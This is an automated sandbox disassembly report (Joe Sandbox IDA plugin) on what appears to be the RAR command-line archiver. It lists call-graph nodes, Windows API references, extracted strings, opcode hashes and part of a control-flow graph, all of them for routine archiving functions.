7ff6bbcd1ecb CreateFileW 39724->39725 39726 7ff6bbcd1fb8 39725->39726 39727 7ff6bbcd1f59 GetLastError 39725->39727 39728 7ff6bbcd1ff7 39726->39728 39730 7ff6bbcd1fd9 SetFileTime 39726->39730 39729 7ff6bbce4534 10 API calls 39727->39729 39732 7ff6bbd0a610 _handle_error 8 API calls 39728->39732 39731 7ff6bbcd1f74 39729->39731 39730->39728 39731->39726 39733 7ff6bbcd1f78 CreateFileW GetLastError 39731->39733 39734 7ff6bbcd203a 39732->39734 39733->39726 39734->39677 39751 7ff6bbcd24e8 39735->39751 39738 7ff6bbcd240e 39738->39683 39740->39680 39741->39684 39743->39692 39744->39696 39745->39698 39746->39701 39747->39704 39748->39688 39749->39693 39757 7ff6bbcd1af0 39751->39757 39754 7ff6bbcd23f9 39754->39738 39756 7ff6bbccca40 61 API calls _CxxThrowException 39754->39756 39756->39738 39758 7ff6bbcd1b01 setbuf 39757->39758 39759 7ff6bbcd1b6f CreateFileW 39758->39759 39760 7ff6bbcd1b68 39758->39760 39759->39760 39761 7ff6bbcd1be1 39760->39761 39762 7ff6bbce4534 10 API calls 39760->39762 39764 7ff6bbd0a610 _handle_error 8 API calls 39761->39764 39763 7ff6bbcd1bb3 39762->39763 39763->39761 39765 7ff6bbcd1bb7 CreateFileW 39763->39765 39766 7ff6bbcd1c14 39764->39766 39765->39761 39766->39754 39767 7ff6bbccca08 10 API calls 39766->39767 39767->39754 39768 7ff6bbd12450 39775 7ff6bbd13734 39768->39775 39770 7ff6bbd12455 39771 7ff6bbd16998 abort LeaveCriticalSection 39770->39771 39772 7ff6bbd12460 39771->39772 39773 7ff6bbd1246c 39772->39773 39774 7ff6bbd12488 11 API calls 39772->39774 39774->39773 39780 7ff6bbd15630 GetLastError 39775->39780 39779 7ff6bbd1373f 39800 7ff6bbd14a1c 35 API calls abort 39779->39800 39781 7ff6bbd15652 39780->39781 39782 7ff6bbd1564d 39780->39782 39786 7ff6bbd1569b 39781->39786 39802 7ff6bbd14b14 15 API calls 3 library calls 39781->39802 39801 7ff6bbd16cf4 6 API calls __vcrt_uninitialize_ptd 39782->39801 39785 7ff6bbd15669 39787 7ff6bbd15671 39785->39787 39803 7ff6bbd16d4c 6 API calls __vcrt_uninitialize_ptd 39785->39803 39789 7ff6bbd156b6 SetLastError 39786->39789 39790 7ff6bbd156a0 SetLastError 39786->39790 39793 7ff6bbd14a74 __free_lconv_num 15 API calls 39787->39793 39805 7ff6bbd14a1c 35 API calls abort 39789->39805 39790->39779 39791 7ff6bbd15688 39791->39787 39794 7ff6bbd1568f 39791->39794 39796 7ff6bbd15678 39793->39796 39804 7ff6bbd153e0 15 API calls abort 39794->39804 39796->39789 39798 7ff6bbd15694 39799 7ff6bbd14a74 __free_lconv_num 15 API calls 39798->39799 39799->39786 39801->39781 39802->39785 39803->39791 39804->39798 39806 7ff6bbd19c74 39807 7ff6bbd19c7c 39806->39807 39808 7ff6bbd19cbb 39807->39808 39810 7ff6bbd19cac 39807->39810 39809 7ff6bbd19cc5 39808->39809 39828 7ff6bbd1ce08 32 API calls 2 library calls 39808->39828 39815 7ff6bbd14b8c 39809->39815 39827 7ff6bbd14f3c 15 API calls abort 39810->39827 39814 7ff6bbd19cb1 memcpy_s 39816 7ff6bbd14bab 39815->39816 39817 7ff6bbd14ba1 39815->39817 39819 7ff6bbd14bb0 39816->39819 39825 7ff6bbd14bb7 __vcrt_getptd_noexit 39816->39825 39818 7ff6bbd14ab4 setbuf 16 API calls 39817->39818 39824 7ff6bbd14ba9 39818->39824 39820 7ff6bbd14a74 __free_lconv_num 15 API calls 39819->39820 39820->39824 39821 7ff6bbd14bf6 39829 7ff6bbd14f3c 15 API calls abort 39821->39829 39822 7ff6bbd14be0 RtlReAllocateHeap 39822->39824 39822->39825 39824->39814 39825->39821 39825->39822 39826 7ff6bbd136c0 new 2 API calls 39825->39826 39826->39825 39827->39814 39828->39809 39829->39824 39830 7ff6bbcb7a5b 39831 7ff6bbcb7a60 39830->39831 39832 7ff6bbcc9be0 14 API calls 39831->39832 39834 7ff6bbcb7af7 39831->39834 39832->39834 39833 7ff6bbcb7bda 39836 7ff6bbcbb540 147 API calls 39833->39836 39834->39833 39863 7ff6bbcd1e1c GetFileTime 39834->39863 39837 7ff6bbcb7bf8 39836->39837 39840 7ff6bbcb7c3e 39837->39840 39864 7ff6bbd09b98 216 API calls 3 library calls 39837->39864 39839 7ff6bbcbb540 147 API calls 39842 7ff6bbcb7c9c 39839->39842 39840->39839 39841 7ff6bbcb7f89 39842->39841 39865 7ff6bbcd6378 39842->39865 39844 7ff6bbcb7cd7 39845 7ff6bbcd6378 4 API calls 39844->39845 39847 7ff6bbcb7cf3 39845->39847 39846 7ff6bbcb7de1 39853 7ff6bbcb7e4e 39846->39853 39870 7ff6bbce98dc 39846->39870 39847->39846 39849 7ff6bbcb7d38 39847->39849 39850 7ff6bbcb7d59 39847->39850 39852 7ff6bbd0a444 new 4 API calls 39849->39852 39851 7ff6bbd0a444 new 4 API calls 39850->39851 39857 7ff6bbcb7d42 std::bad_alloc::bad_alloc 39851->39857 39852->39857 39876 7ff6bbcb1204 48 API calls 39853->39876 39855 7ff6bbcb7eb3 39858 7ff6bbcb7edb 39855->39858 39877 7ff6bbce9680 39855->39877 39857->39846 39869 7ff6bbd0ba34 RtlPcToFileHeader RaiseException 39857->39869 39883 7ff6bbcd6424 8 API calls _handle_error 39858->39883 39861 7ff6bbcb7f56 39862 7ff6bbcbb540 147 API calls 39861->39862 39862->39841 39863->39833 39864->39840 39866 7ff6bbcd6396 39865->39866 39868 7ff6bbcd63a0 39865->39868 39867 7ff6bbd0a444 new 4 API calls 39866->39867 39867->39868 39868->39844 39869->39846 39871 7ff6bbce993c 39870->39871 39872 7ff6bbce9926 39870->39872 39874 7ff6bbcc90b8 75 API calls 39871->39874 39873 7ff6bbcc90b8 75 API calls 39872->39873 39875 7ff6bbce9934 39873->39875 39874->39875 39875->39853 39876->39855 39878 7ff6bbce96a4 39877->39878 39879 7ff6bbce97d7 39878->39879 39880 7ff6bbcd2574 126 API calls 39878->39880 39882 7ff6bbd09b98 216 API calls 39878->39882 39884 7ff6bbcd6498 72 API calls new 39878->39884 39880->39878 39882->39878 39883->39861 39884->39878
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: *.%ls$*?.$+$7z;ace;arj;bz2;cab;gz;jpeg;jpg;lha;lz;lzh;mp3;rar;taz;tgz;xz;z;zip;zipx$EML$ERR$LOG$NUL$OFF$SFX$SND$VER$default.sfx$rar.log$stdin$stdin
                                                                                                                                                                                                                              • API String ID: 0-1628410872
                                                                                                                                                                                                                              • Opcode ID: b9d6aeb0518eca3664f40ad1619fad4736c7e1389d4ca9ce6415b1a8c264bdf8
                                                                                                                                                                                                                              • Instruction ID: 06c2e6b802bfc482f84bc09b4a0c66c8a8b6f31a4673935ebaaf1c56d7b07e73
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b9d6aeb0518eca3664f40ad1619fad4736c7e1389d4ca9ce6415b1a8c264bdf8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9DC2B472A0C18281EA64DF2C824D1BD2AB1BF29784F998135CB4EC72F5DF6DE945C394
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: %s%s $.ext$exe$rar$sfx$,6$BK$q:
                                                                                                                                                                                                                              • API String ID: 0-1660254149
                                                                                                                                                                                                                              • Opcode ID: fcae9a43a8aee64a161a70ef5c03c8a1e75f6e78424a2bd0d1ad2b3f27dabaca
                                                                                                                                                                                                                              • Instruction ID: 347f999c8ac34d944b2e138107f5b9047a91c8a5d1f28f23fa021096d95e693b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fcae9a43a8aee64a161a70ef5c03c8a1e75f6e78424a2bd0d1ad2b3f27dabaca
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C4E2B226A09ACA89EB30DF29D8482FD2BB1FB49788F454035DB5D8B7A6DF39D545C300

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00007FF6BBCF4AE0: FreeLibrary.KERNEL32(?,?,00000000,00007FF6BBCCCC90), ref: 00007FF6BBCF4AF5
                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(?,?,?,00007FF6BBCE7E7D), ref: 00007FF6BBCF492E
                                                                                                                                                                                                                              • GetVersionExW.KERNEL32(?,?,?,00007FF6BBCE7E7D), ref: 00007FF6BBCF496A
                                                                                                                                                                                                                              • LoadLibraryExW.KERNELBASE(?,?,?,00007FF6BBCE7E7D), ref: 00007FF6BBCF4993
                                                                                                                                                                                                                              • LoadLibraryW.KERNEL32(?,?,?,00007FF6BBCE7E7D), ref: 00007FF6BBCF499F
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Library$Load$FileFreeModuleNameVersion
                                                                                                                                                                                                                              • String ID: rarlng.dll
                                                                                                                                                                                                                              • API String ID: 2520153904-1675521814
                                                                                                                                                                                                                              • Opcode ID: 49b096ca26b206715f71fd28137422a8c8958387befaadcb30f15fb4690b8ba1
                                                                                                                                                                                                                              • Instruction ID: c29f9ada4f9028c8f0e15496430152894cf363863612fec2b6f50f3f2f92c68a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 49b096ca26b206715f71fd28137422a8c8958387befaadcb30f15fb4690b8ba1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 16312F31718A8285FB68DF29E8852E92374FB49784F844175EB4DC2AA5DF3CE649CB40

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FindFirstFileW.KERNELBASE(?,?,00000000,?,?,00007FF6BBCD4620,?,00000000,?,00007FF6BBCF7A8C), ref: 00007FF6BBCD4736
                                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,00000000,?,?,00007FF6BBCD4620,?,00000000,?,00007FF6BBCF7A8C), ref: 00007FF6BBCD476B
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,?,?,00007FF6BBCD4620,?,00000000,?,00007FF6BBCF7A8C), ref: 00007FF6BBCD477A
                                                                                                                                                                                                                              • FindNextFileW.KERNELBASE(?,?,00000000,?,?,00007FF6BBCD4620,?,00000000,?,00007FF6BBCF7A8C), ref: 00007FF6BBCD47A4
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,?,?,00007FF6BBCD4620,?,00000000,?,00007FF6BBCF7A8C), ref: 00007FF6BBCD47B2
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileFind$ErrorFirstLast$Next
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 869497890-0
                                                                                                                                                                                                                              • Opcode ID: db65eb08b1281c8d58974f0f5f4a9386b8e365cfc9a754ba939093b9379e8a24
                                                                                                                                                                                                                              • Instruction ID: 9ed9c74dafd5e9200cb55794100ab55cf0346b0b78c34bf0927082b3a47d944a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: db65eb08b1281c8d58974f0f5f4a9386b8e365cfc9a754ba939093b9379e8a24
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2C41A136708A8196EA28DB29E5442E963A0FB4D7B4F404331EB7D837E5DF6CE159C700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1815803762-0
                                                                                                                                                                                                                              • Opcode ID: a0191cfd7649e62a748f4a6898c5e4dd5358cd018192ea96d54baefd87fc6459
                                                                                                                                                                                                                              • Instruction ID: ec507599c9b79f09b923f9454cd8294f7e62692de4016a61601a10b99012efb8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a0191cfd7649e62a748f4a6898c5e4dd5358cd018192ea96d54baefd87fc6459
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2C016D26B0869082F7448B1AE9543296761FBD8FD0F198531DF4D83B68CF7DD9468744
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Char
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 751630497-0
                                                                                                                                                                                                                              • Opcode ID: 544a3eeab9b7365b5894b0fe2e19e3e09eeebdeb3bd711af898eb3b5dda5a90f
                                                                                                                                                                                                                              • Instruction ID: e438bf8a6299c7ab51eecd28e0f4b122e952251489ffa04f8dc04bc7d265d81d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 544a3eeab9b7365b5894b0fe2e19e3e09eeebdeb3bd711af898eb3b5dda5a90f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9F22AF22A0868696EB24DF34D5452FEBBB0FB58748F484035DB8D972A9CF7CE942C750
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: ac23bd2f1d97dba6c8ed780cfc15edbe6b4d609a338b12ac683d3955c16e23e4
                                                                                                                                                                                                                              • Instruction ID: d7053b721e97c28e9971026a3150774fd8249a99c6abbf4eaada31f9927f9105
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ac23bd2f1d97dba6c8ed780cfc15edbe6b4d609a338b12ac683d3955c16e23e4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0F71C032A05A8586D748DF29E4153ED33A1FB8CB98F084239DB5DCB3A9DF78A051C790

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 635 7ff6bbcf3ea8-7ff6bbcf3f03 call 7ff6bbd0a5a0 call 7ff6bbd0c8a0 640 7ff6bbcf3f05-7ff6bbcf3f3e GetModuleFileNameW call 7ff6bbce4e14 call 7ff6bbcfa9c0 635->640 641 7ff6bbcf3f40-7ff6bbcf3f50 call 7ff6bbcfa9e8 635->641 645 7ff6bbcf3f55-7ff6bbcf3f79 call 7ff6bbcd1874 call 7ff6bbcd1e80 640->645 641->645 652 7ff6bbcf4692-7ff6bbcf46c5 call 7ff6bbcd18ac call 7ff6bbd0a610 645->652 653 7ff6bbcf3f7f-7ff6bbcf3f89 645->653 655 7ff6bbcf3fae-7ff6bbcf3feb call 7ff6bbd0ec70 * 2 653->655 656 7ff6bbcf3f8b-7ff6bbcf3fac call 7ff6bbcf11c0 * 2 653->656 668 7ff6bbcf3fef-7ff6bbcf3ff3 655->668 656->655 669 7ff6bbcf40f2-7ff6bbcf4112 call 7ff6bbcd22e0 call 7ff6bbd0eb90 668->669 670 7ff6bbcf3ff9-7ff6bbcf402d call 7ff6bbcd2440 call 7ff6bbcd2150 668->670 669->652 679 7ff6bbcf4118-7ff6bbcf4131 call 7ff6bbcd2150 669->679 680 7ff6bbcf4033 670->680 681 7ff6bbcf40bc-7ff6bbcf40e2 call 7ff6bbcd22e0 670->681 693 7ff6bbcf4133-7ff6bbcf4136 679->693 694 7ff6bbcf4138-7ff6bbcf414b call 7ff6bbd0eb90 679->694 684 7ff6bbcf403a-7ff6bbcf403e 680->684 681->668 690 7ff6bbcf40e8-7ff6bbcf40ec 681->690 685 7ff6bbcf4064-7ff6bbcf4069 684->685 686 7ff6bbcf4040-7ff6bbcf4044 684->686 691 7ff6bbcf406b-7ff6bbcf4070 685->691 692 7ff6bbcf4097-7ff6bbcf409f 685->692 686->685 689 7ff6bbcf4046-7ff6bbcf405e call 7ff6bbd12290 686->689 707 7ff6bbcf40a3-7ff6bbcf40a7 689->707 708 7ff6bbcf4060 689->708 690->652 690->669 691->692 696 7ff6bbcf4072-7ff6bbcf4078 691->696 697 7ff6bbcf40a1 692->697 698 7ff6bbcf40b7 692->698 699 7ff6bbcf416f-7ff6bbcf41b1 call 7ff6bbcfa900 call 7ff6bbd0eb90 693->699 694->652 706 7ff6bbcf4151-7ff6bbcf416c call 7ff6bbcfd54c call 7ff6bbd0eb88 694->706 704 7ff6bbcf4093 696->704 705 7ff6bbcf407a-7ff6bbcf4091 call 7ff6bbd11700 696->705 697->684 698->681 718 7ff6bbcf41b3-7ff6bbcf41bb call 7ff6bbd0eb88 699->718 719 7ff6bbcf41c0-7ff6bbcf41d5 699->719 704->692 705->704 716 7ff6bbcf40a9-7ff6bbcf40b5 705->716 706->699 707->698 708->685 716->681 718->652 722 7ff6bbcf45f0-7ff6bbcf4624 call 7ff6bbcf3884 call 7ff6bbd0eb88 * 2 719->722 723 7ff6bbcf41db 719->723 754 7ff6bbcf464a-7ff6bbcf4691 call 7ff6bbd0ec70 * 2 722->754 755 7ff6bbcf4626-7ff6bbcf4648 call 7ff6bbcf11c0 * 2 722->755 724 7ff6bbcf41e1-7ff6bbcf41ee 723->724 727 7ff6bbcf41f4-7ff6bbcf41fa 724->727 728 7ff6bbcf4508-7ff6bbcf4513 724->728 730 7ff6bbcf41fc-7ff6bbcf4202 727->730 731 7ff6bbcf4208-7ff6bbcf420e 727->731 